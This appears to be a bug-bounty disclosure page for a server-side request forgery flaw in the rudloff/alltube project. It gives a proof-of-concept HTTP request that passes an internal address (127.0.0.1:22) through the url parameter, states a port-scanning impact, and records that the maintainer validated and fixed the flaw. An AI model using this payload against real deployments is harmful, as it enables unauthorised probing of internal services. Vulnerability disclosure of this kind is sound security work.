Server-Side Request Forgery (SSRF) in rudloff/alltube

Valid

Reported on

Feb 26th 2022


Description

Alltube takes URL from the query parameter and directly uses it in the youtube-dl command, It makes any unauthenticated attacker can perform an SSRF attack and pass internal hostnames in the URL parameter and obtain information about that service from the response.

Proof of Concept

GET /alltube/index.php/info?url=http://127.0.0.1:22 HTTP/1.1
Host: 127.0.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://127.0.0.1/alltube/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=qcnp4gcfj3ni5c02u60ivovj0l
Connection: close

Deepin-Screenshot-select-area-20220226090828.png

Impact

This vulnerability is capable of internal port scanning and obtaining sensitive information about services on localhost and sending requests to them.

We are processing your report and will contact the rudloff/alltube team within 24 hours. 3 months ago
We have contacted a member of the rudloff/alltube team and are waiting to hear back 3 months ago
Pierre Rudloff modified the report
3 months ago
Pierre Rudloff validated this vulnerability 3 months ago
Anna has been awarded the disclosure bounty
The fix bounty is now up for grabs
Pierre Rudloff confirmed that a fix has been merged on 148a17 3 months ago
The fix bounty has been dropped
DownloadController.php#L46 has been validated
to join this conversation